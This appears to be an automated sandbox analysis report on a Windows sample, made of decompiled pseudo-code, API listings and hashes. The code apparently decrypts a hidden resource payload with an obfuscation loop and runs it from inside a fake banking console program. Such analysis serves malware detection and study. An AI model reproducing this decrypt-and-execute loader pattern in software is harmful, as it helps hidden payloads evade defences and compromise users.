                                                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction Fuzzy Hash: 58E012B1210208ABDB14EF99CC41EA777ADAF88664F118559BA085B242C630F9118AB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041A3A0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                				int _t10;
                                                				void* _t15;
                                                
                                                				E0041AB30(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                				return _t10;
                                                			}






                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A3D0
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction ID: 9e479b2eaf60326b59b5a15a73b63e8f9b290ab663b6f1255dfa49a1ae2fc0e3
                                                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction Fuzzy Hash: DFE01AB12002086BDB10DF49CC85EE737ADAF88650F018155BA0857241C934F8118BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A2A8
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction ID: ec4c192c261470033b7d3fff11050ba2ce0bed15fbfecc5592b4580303735d53
                                                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction Fuzzy Hash: 29D017726142187BD620EB99CC85FD777ACDF487A0F0181A9BA1C6B242C531BA108AE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1662bd115923131e5d17dc8aa0857c51b5e8532772756ccf034c0641cec94cbd
                                                • Instruction ID: aaefb60808a7f44ad45222764507eae94aad405ed0a2fa079d827d119c3ce53d
                                                • Opcode Fuzzy Hash: 1662bd115923131e5d17dc8aa0857c51b5e8532772756ccf034c0641cec94cbd
                                                • Instruction Fuzzy Hash: D1B09B71D015C5C5DB11E7A44708737794477D0749F16C051D1060641B4778C491F5B5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                C-Code - Quality: 55%
                                                			E01231040(void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                				signed int _v5;
                                                				signed int _v12;
                                                				struct HINSTANCE__* _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				intOrPtr _v44;
                                                				char _v48;
                                                				char _v1048;
                                                				char _v7712;
                                                				void* __ebp;
                                                				void* _t133;
                                                				void* _t134;
                                                				void* _t176;
                                                				void* _t177;
                                                				void* _t178;
                                                				void* _t179;
                                                				void* _t180;
                                                				void* _t184;
                                                
                                                				_t184 = __fp0;
                                                				_t177 = __esi;
                                                				_t176 = __edi;
                                                				_t134 = __ecx;
                                                				E01238770(0x1e1c);
                                                				_v16 = GetModuleHandleW(L"Kernel32.dll");
                                                				E01236B80(_t134);
                                                				_v44 = E01236A70(_v16, 0xb616c5d9);
                                                				_v40 = E01236A70(_v16, 0xe0baa99);
                                                				_v32 = E01236A70(LoadLibraryW(L"User32.dll"), 0x23fdef72);
                                                				_v24 = E01236A70(LoadLibraryW(L"User32.dll"), 0x695c9378);
                                                				_v36 = E01236A70(_v16, 0x9347c911);
                                                				_v28 = _v36(0, L"IEUCIZEO", 0xa);
                                                				_v20 = _v40(0, _v28);
                                                				E01237AE0( &_v7712, _v20, 0x1a05);
                                                				_t180 = _t179 + 0xc;
                                                				_v12 = 0;
                                                				while(_v12 < 0x1a05) {
                                                					_v5 =  *((intOrPtr*)(_t178 + _v12 - 0x1e1c));
                                                					_v5 = _v5 & 0x000000ff ^ _v12;
                                                					_v5 =  !(_v5 & 0x000000ff);
                                                					_v5 = _v5 & 0x000000ff ^ 0x00000086;
                                                					_v5 = (_v5 & 0x000000ff) + 0x17;
                                                					_v5 = _v5 & 0x000000ff ^ _v12;
                                                					_v5 = (_v5 & 0x000000ff) + _v12;
                                                					_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
                                                					_v5 =  ~(_v5 & 0x000000ff);
                                                					_v5 = (_v5 & 0x000000ff) - _v12;
                                                					_v5 =  !(_v5 & 0x000000ff);
                                                					_v5 = _v5 & 0x000000ff ^ _v12;
                                                					_v5 =  !(_v5 & 0x000000ff);
                                                					_v5 = (_v5 & 0x000000ff) - 0x4c;
                                                					_v5 =  !(_v5 & 0x000000ff);
                                                					_v5 = (_v5 & 0x000000ff) + 0x13;
                                                					_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
                                                					_v5 = (_v5 & 0x000000ff) - _v12;
                                                					_v5 =  !(_v5 & 0x000000ff);
                                                					 *((char*)(_t178 + _v12 - 0x1e1c)) = _v5;
                                                					_v12 = _v12 + 1;
                                                				}
                                                				_v44( &_v7712, 0x1a05, 0x40,  &_v48);
                                                				_v32(_v24(0, 0,  &_v7712,  &_v1048, 0, 0, 0, 0, 0));
                                                				E012321E0( &_v7712, _t176, _t177, __eflags);
                                                				while(1) {
                                                					E01231380(_t176, _t177, __eflags, 8, 9, 0x46, 0xd);
                                                					E012312B0(0xa, 0xb);
                                                					_push("Press A to Log in as ADMINISTRATOR or S to log in as STAFF\n\n\n\t\t\t\t\t");
                                                					E0123715C(_t133, _t176, _t177, __eflags);
                                                					_t180 = _t180 + 4;
                                                					__eflags = (_v5 & 0x000000ff) - 0x41;
                                                					if((_v5 & 0x000000ff) == 0x41) {
                                                						break;
                                                					}
                                                					__eflags = (_v5 & 0x000000ff) - 0x61;
                                                					if((_v5 & 0x000000ff) != 0x61) {
                                                						__eflags = (_v5 & 0x000000ff) - 0x53;
                                                						if((_v5 & 0x000000ff) == 0x53) {
                                                							L10:
                                                							E01233610(_t133, _t176, _t177, _t184);
                                                						} else {
                                                							__eflags = (_v5 & 0x000000ff) - 0x73;
                                                							if((_v5 & 0x000000ff) != 0x73) {
                                                								__eflags = (_v5 & 0x000000ff) - 0x1b;
                                                								if((_v5 & 0x000000ff) == 0x1b) {
                                                									E012377B1(0);
                                                								}
                                                								__eflags = 1;
                                                								if(1 != 0) {
                                                									continue;
                                                								}
                                                							} else {
                                                								goto L10;
                                                							}
                                                						}
                                                					} else {
                                                						break;
                                                					}
                                                					L14:
                                                					__eflags = 0;
                                                					return 0;
                                                				}
                                                				E012322F0(_t176, _t177, _t184);
                                                				goto L14;
                                                			}


























                                                APIs
                                                • GetModuleHandleW.KERNEL32(Kernel32.dll,?,012389A2,01230000,00000000,00000000), ref: 01231052
                                                  • Part of subcall function 01236B80: GetProcessHeap.KERNEL32(00000001,17D78400,00000000,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236B8C
                                                  • Part of subcall function 01236B80: HeapAlloc.KERNEL32(00000000,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236B93
                                                  • Part of subcall function 01236B80: GetProcessHeap.KERNEL32(00000001,00000000,00000000,17D78400,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236BCD
                                                  • Part of subcall function 01236B80: HeapAlloc.KERNEL32(00000000,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236BD4
                                                • LoadLibraryW.KERNEL32(User32.dll,23FDEF72,?,0E0BAA99,?,B616C5D9,?,012389A2,01230000,00000000,00000000), ref: 0123108C
                                                • LoadLibraryW.KERNEL32(User32.dll,695C9378,00000000,?,012389A2,01230000,00000000,00000000), ref: 012310A5
                                                • _memmove.LIBCMT ref: 012310F0
                                                • _wprintf.LIBCMT ref: 01231251
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Heap$AllocLibraryLoadProcess$HandleModule_memmove_wprintf
                                                • String ID: IEUCIZEO$Kernel32.dll$Press A to Log in as ADMINISTRATOR or S to log in as STAFF$User32.dll$User32.dll
                                                • API String ID: 2215760113-1224953502
                                                • Opcode ID: f1cfb7da98e0fbe52f0e95d8b6ba0e414f76b35301000ca7434cbb7e7ed0b6dd
                                                • Instruction ID: 08afd9cc00af8b1cae2df22be8b0b0cae08a55812a14bfa0ec7aad7eb6c1d1d6
                                                • Opcode Fuzzy Hash: f1cfb7da98e0fbe52f0e95d8b6ba0e414f76b35301000ca7434cbb7e7ed0b6dd
                                                • Instruction Fuzzy Hash: 56719CB4D5C2E9BADF01DBF988507FDBFB45F9A201F0880C9E5D1B6282C675474A8B21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                • Instruction ID: 48b726ebfc026785c1bb8cf5c1d03c123f498b95ff00f0360e3eb5f090f72014
                                                • Opcode Fuzzy Hash: ede841c32203cf8af0c2e523c33d9dcb00fe2acc6c692a9ea562ebfeca6c930f
                                                • Instruction Fuzzy Hash: D6900271E05140129640719D49546468086B7F0781B55C011A0544554CD9948E5563F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 378bc2a0dc496419ad7baf404434bb0cb030133c69c5804b2192d5e3de58ab61
                                                • Instruction ID: 6f741133ff3f8d30717b3d3b126bc03f191a3f2b63172af9ea95d555ec0a93f3
                                                • Opcode Fuzzy Hash: 378bc2a0dc496419ad7baf404434bb0cb030133c69c5804b2192d5e3de58ab61
                                                • Instruction Fuzzy Hash: F99002E1601280924A00A29D8544B0A8585A7F0241B51C016E1084560CD5658C51A175
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e1917fca842847c01fd2bb360e07545c2957e2e1e9c1335278c2d6dc4c6ba968
                                                • Instruction ID: eca6ea7c8579fcf69a21bcee13bdce272230ae55311da9a9d4babf70c7107d96
                                                • Opcode Fuzzy Hash: e1917fca842847c01fd2bb360e07545c2957e2e1e9c1335278c2d6dc4c6ba968
                                                • Instruction Fuzzy Hash: 6A9002A160154403D640659D49446074085A7E0342F51C011A2094555EDA698C517175
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 68b7bb8c323923e24053affce95c4281105f162335179c3f7a5e103305c5aa63
                                                • Instruction ID: cea3cd2c9b15452cd82c8c1cb68109e286883d8118697a7f27a3ba50c4a4501e
                                                • Opcode Fuzzy Hash: 68b7bb8c323923e24053affce95c4281105f162335179c3f7a5e103305c5aa63
                                                • Instruction Fuzzy Hash: 50900265621140020645A59D074450B44C5B7E6391391C015F1446590CD6618C656371
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2ba51183ab12ec0216edd9739b0ec6954936482cd92045d2d6176b9d6d60baae
                                                • Instruction ID: ebce26a439709537a23a87dbbdf736fb452a604e34e9c2a6bb718df04fc09f0e
                                                • Opcode Fuzzy Hash: 2ba51183ab12ec0216edd9739b0ec6954936482cd92045d2d6176b9d6d60baae
                                                • Instruction Fuzzy Hash: 0C90026170114402D602619D45546064089E7E1385F91C012E1454555DD6658D53B172
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9193a5ea08c7b8197f049ccdbd6beb7866f32a9e89487e7303db2c107bff22e9
                                                • Instruction ID: b89375cfd68cae2557abc3dcf93c65aa4e13b06b7ff7f89777e1a4e7d66255ad
                                                • Opcode Fuzzy Hash: 9193a5ea08c7b8197f049ccdbd6beb7866f32a9e89487e7303db2c107bff22e9
                                                • Instruction Fuzzy Hash: 2390027164114402D641719D45446064089B7E0281F91C012A0454554ED6958E56BAB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c1f81e65b68d69565af5bbf9ed0bc5e100588cefee8b9b9455d2e785826ad0ce
                                                • Instruction ID: 3f60c07b36ba8f31534bd37cefc70e48a23aba5613d0cec11d82dfa7206762af
                                                • Opcode Fuzzy Hash: c1f81e65b68d69565af5bbf9ed0bc5e100588cefee8b9b9455d2e785826ad0ce
                                                • Instruction Fuzzy Hash: C49002A1A01280434A40B19D49444069095B7F1341391C121A0484560CD6A88C55A2B5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 413da06535e55ea3e9d3a3530e5b2f3edb00b6a8d47773fb856b4dac50c10a5a
                                                • Instruction ID: 22c413a8a15c29b30bdaeafcd78e8bb329c3cc285faba056ea7f1f4eeeb0b252
                                                • Opcode Fuzzy Hash: 413da06535e55ea3e9d3a3530e5b2f3edb00b6a8d47773fb856b4dac50c10a5a
                                                • Instruction Fuzzy Hash: F290027160158002D640719D858460B9085B7F0341F51C411E0455554CD6558C56A271
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 38f159d09d43c829571a3791c944ba5d32f169001ad8e9c0ff55bc53ed2d808a
                                                • Instruction ID: 415774f823e7eb23d04e82c17eee371283a1678d1cccae66b933bd0cfd7e596b
                                                • Opcode Fuzzy Hash: 38f159d09d43c829571a3791c944ba5d32f169001ad8e9c0ff55bc53ed2d808a
                                                • Instruction Fuzzy Hash: BF90027171128402D610619D85447064085A7E1241F51C411A0854558DD6D58C917172
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 317b382cdb69c6d43c4e196e7c913c3949e609f6f6f22570d6c3969170e35df9
                                                • Instruction ID: 49c0606e7535c9f9c646519357cc76a4ed7a2c40a4dc88a29480154c111d3ac0
                                                • Opcode Fuzzy Hash: 317b382cdb69c6d43c4e196e7c913c3949e609f6f6f22570d6c3969170e35df9
                                                • Instruction Fuzzy Hash: 77900271701140529A00A6DD5944A4A8185A7F0341B51D015A4044554CD5948C616171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aca2cc6393c5e2553f615b1ec747f1ef264a436cc969d7ab4ac039f211f8717c
                                                • Instruction ID: 45d182c5a1e4412acaabf3b640b9910a2de1ca7c5eb964e8c6794810d4d99353
                                                • Opcode Fuzzy Hash: aca2cc6393c5e2553f615b1ec747f1ef264a436cc969d7ab4ac039f211f8717c
                                                • Instruction Fuzzy Hash: 7990026164114802D640719D85547074086E7E0641F51C011A0054554DD6568D6576F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: df15a5ff6d67262dcb5da7bd7ec582f848a42dc331a917cc58f1fbc7d9a96343
                                                • Instruction ID: 0c4fcb233cc35a2e1d89d4b2f544482e3163e560696ad035dab699ca00f620ce
                                                • Opcode Fuzzy Hash: df15a5ff6d67262dcb5da7bd7ec582f848a42dc331a917cc58f1fbc7d9a96343
                                                • Instruction Fuzzy Hash: BD900261A0514402D640719D55587064095A7E0241F51D011A0054554DD6998E5576F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: be01d2c0dd09d1a5d5fe4acc817e93c2d2c8c073abd2923383820fb00a1aff73
                                                • Instruction ID: 4add7155b5fd2cc3e4d3dbe9fd4773e0a132501317551c49cbeaeb4971eeb6af
                                                • Opcode Fuzzy Hash: be01d2c0dd09d1a5d5fe4acc817e93c2d2c8c073abd2923383820fb00a1aff73
                                                • Instruction Fuzzy Hash: 3590026160518442D600659D5548A064085A7E0245F51D011A1094595DD6758C51B171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2f33805988ee416b805a5be47ac9c723129484b39b5ccc4203c412704544fc3c
                                                • Instruction ID: 3af2ccf5fa9b20b51b2db2ca851f751edabea4502f88801a2a6535a37d7fc0b1
                                                • Opcode Fuzzy Hash: 2f33805988ee416b805a5be47ac9c723129484b39b5ccc4203c412704544fc3c
                                                • Instruction Fuzzy Hash: 9A90027560518442DA00659D5944A874085A7E0345F51D411A045459CDD6948C61B171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d06f9e1932d41a62f45c15506eecc45d81d31af81db51a537195bb7e4aff060c
                                                • Instruction ID: f8cc8789e6eccbeadd767d8d264ae6f1378c6d2753f65fd383e3cc5677ad9101
                                                • Opcode Fuzzy Hash: d06f9e1932d41a62f45c15506eecc45d81d31af81db51a537195bb7e4aff060c
                                                • Instruction Fuzzy Hash: 1390027160114403D600619D56487074085A7E0241F51D411A0454558DE6968C517171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 63cbe61af9e3bc55b05766931e116deceb881c62741466397ee5132e25e027a3
                                                • Instruction ID: 066649558155f1423e5e99c0926593490336b44158d275aa9375782b0ef1d064
                                                • Opcode Fuzzy Hash: 63cbe61af9e3bc55b05766931e116deceb881c62741466397ee5132e25e027a3
                                                • Instruction Fuzzy Hash: 4D90026160158442D640629D4944B0F8185A7F1242F91C019A4186554CD9558C556771
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fa2a1b3c198c475696aaba272b2e21c7f91e06d7383f74d611a310c64d2825af
                                                • Instruction ID: bb9009c0f8314e72c5b3b8864137955bc184ce3d09465d030f893f58ea6d5457
                                                • Opcode Fuzzy Hash: fa2a1b3c198c475696aaba272b2e21c7f91e06d7383f74d611a310c64d2825af
                                                • Instruction Fuzzy Hash: B890027160114842D600619D4544B464085A7F0341F51C016A0154654DD655CC517571
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2efced8a0f5438b7bb86f8ea68d2c94c6212bc991dbaac6998310efae2d09289
                                                • Instruction ID: ca72f2b5b99be7b467899281f001bc67e45b1d8fb66aca1633d7f6ed29ac51fd
                                                • Opcode Fuzzy Hash: 2efced8a0f5438b7bb86f8ea68d2c94c6212bc991dbaac6998310efae2d09289
                                                • Instruction Fuzzy Hash: DF90027160154402D600619D49487474085A7E0342F51C011A5194555ED6A5CC917571
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cea531db041bddc200c99bc84da16ce853e89b8615ea3786352d677b4474ba72
                                                • Instruction ID: d63773590e2cf4e873015c732a2a3c24ba620c9bf987008124fe9960af228091
                                                • Opcode Fuzzy Hash: cea531db041bddc200c99bc84da16ce853e89b8615ea3786352d677b4474ba72
                                                • Instruction Fuzzy Hash: 46900271A0514802D650719D45547464085A7E0341F51C011A0054654DD7958E5576F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 62%
                                                			E01233610(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                				char _v5;
                                                				intOrPtr _v12;
                                                				signed int _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				char _v36;
                                                				char _v39;
                                                				char _v43;
                                                				char _v47;
                                                				char _v51;
                                                				char _v55;
                                                				char _v59;
                                                				char _v63;
                                                				char _v67;
                                                				char _v68;
                                                				char _v80;
                                                				char _v92;
                                                				char _v124;
                                                				char _v156;
                                                				void* __ebp;
                                                				intOrPtr _t58;
                                                				intOrPtr _t60;
                                                				void* _t61;
                                                				void* _t98;
                                                				void* _t99;
                                                				void* _t108;
                                                				intOrPtr _t111;
                                                				void* _t121;
                                                				void* _t122;
                                                				void* _t123;
                                                				void* _t127;
                                                				void* _t128;
                                                				void* _t129;
                                                				void* _t130;
                                                				void* _t131;
                                                				void* _t139;
                                                				void* _t148;
                                                
                                                				_t148 = __fp0;
                                                				_t122 = __esi;
                                                				_t121 = __edi;
                                                				_t108 = __ebx;
                                                				_v68 = 0;
                                                				_v67 = 0;
                                                				_v63 = 0;
                                                				_v59 = 0;
                                                				_v55 = 0;
                                                				_v51 = 0;
                                                				_v47 = 0;
                                                				_v43 = 0;
                                                				_v39 = 0;
                                                				_v12 = 0;
                                                				_v20 = 0;
                                                				_v20 = 0;
                                                				do {
                                                					E01231380(_t121, _t122, 0, 0xa, 8, 0x46, 0xf);
                                                					E012312B0(7, 5);
                                                					_push("Only THREE attempts shall be allowed to enter username and password.");
                                                					E0123715C(_t108, _t121, _t122, 0);
                                                					E012312B0(0x17, 0xa);
                                                					_push("Enter User name : ");
                                                					E0123715C(_t108, _t121, _t122, 0);
                                                					E0123738B("%s", 0x1252ee4);
                                                					E012312B0(0x17, 0xc);
                                                					_push("Password        : ");
                                                					E0123715C(_t108, _t121, _t122, 0);
                                                					_t127 = _t123 + 0x14;
                                                					E012312F0(_t121, _t122,  &_v68);
                                                					_v20 = _v20 + 1;
                                                					_t143 = _v20 - 3;
                                                					if(_v20 == 3) {
                                                						E012320E0( &_v68, _t121, _t122, _t143, _t148);
                                                						E012312B0(0x19, 0xa);
                                                						_push(0x124fb98);
                                                						E0123715C(_t108, _t121, _t122, _t143);
                                                						E012312B0(0x16, 0xc);
                                                						_push("Press ENTER to exit the program...");
                                                						E0123715C(_t108, _t121, _t122, _t143);
                                                						_t127 = _t127 + 8;
                                                						E012377B1(0);
                                                					}
                                                					_v12 = 0;
                                                					_t58 = E01236EF1("USER.DAT", "r");
                                                					_t128 = _t127 + 8;
                                                					 *0x1252f28 = _t58;
                                                					while(1) {
                                                						_push( &_v156);
                                                						_push( &_v124);
                                                						_t60 =  *0x1252f28; // 0x0
                                                						_t61 = E01237021(_t60, "%s %s %s\n",  &_v92);
                                                						_t129 = _t128 + 0x14;
                                                						if(_t61 == 0xffffffff) {
                                                							break;
                                                						}
                                                						_t98 = E01238230(0x1252ee4,  &_v124);
                                                						_t128 = _t129 + 8;
                                                						if(_t98 == 0) {
                                                							_t99 = E01238230(0x1252f02,  &_v156);
                                                							_t128 = _t128 + 8;
                                                							if(_t99 == 0) {
                                                								_v12 = _v12 + 1;
                                                							}
                                                						}
                                                					}
                                                					_t111 =  *0x1252f28; // 0x0
                                                					_push(_t111);
                                                					E01236DB6(_t108, _t121, _t122, __eflags);
                                                					_t130 = _t129 + 4;
                                                					E012320E0(_t111, _t121, _t122, __eflags, _t148);
                                                					__eflags = _v12;
                                                					if(__eflags == 0) {
                                                						goto L10;
                                                					}
                                                					break;
                                                					L10:
                                                					E012312B0(0xa, 0xa);
                                                					_push(0x124fbf8);
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					_t123 = _t130 + 4;
                                                					__eflags = 1;
                                                				} while (1 != 0);
                                                				E01238417(__eflags,  &_v80);
                                                				_t131 = _t130 + 4;
                                                				E01233AB0(_t108, _t121, _t122, _t148);
                                                				do {
                                                					E012320E0(_t111, _t121, _t122, __eflags, _t148);
                                                					E012312B0(0xf, 8);
                                                					_push("1. Create New Account\n");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0xf, 0xa);
                                                					_push("2. Cash Deposit");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0xf, 0xc);
                                                					_push("3. Cash Withdrawl");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0xf, 0xe);
                                                					_push("4. Fund Transfer");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0xf, 0x10);
                                                					_push("5. Account information");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0x2d, 8);
                                                					_push("6. Transaction information");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0x2d, 0xa);
                                                					_push("7. Log out");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0x2d, 0xc);
                                                					_push("8. Exit");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					_t139 = _t131 + 0x20;
                                                					E012312B0(1, 0x11);
                                                					_v24 = 0;
                                                					while(1) {
                                                						__eflags = _v24 - 0x4e;
                                                						if(__eflags >= 0) {
                                                							break;
                                                						}
                                                						_push("_");
                                                						E0123715C(_t108, _t121, _t122, __eflags);
                                                						_t139 = _t139 + 4;
                                                						_t111 = _v24 + 1;
                                                						__eflags = _t111;
                                                						_v24 = _t111;
                                                					}
                                                					E012312B0(0x17, 0x13);
                                                					_push("Press a choice between the range [1-8] ");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					_t131 = _t139 + 4;
                                                					_v16 = 0x30;
                                                					_v16 = _v16 - 1;
                                                					__eflags = _v16 - 7;
                                                					if(__eflags > 0) {
                                                						E012320E0(_t111, _t121, _t122, __eflags, _t148);
                                                						E012312B0(0xa, 0xa);
                                                						_push("Your input is out of range! Enter a choice between 1 to 8!");
                                                						E0123715C(_t108, _t121, _t122, __eflags);
                                                						E012312B0(0xf, 0xc);
                                                						_push("Press any key to return to main menu...");
                                                						E0123715C(_t108, _t121, _t122, __eflags);
                                                						_t131 = _t131 + 8;
                                                					} else {
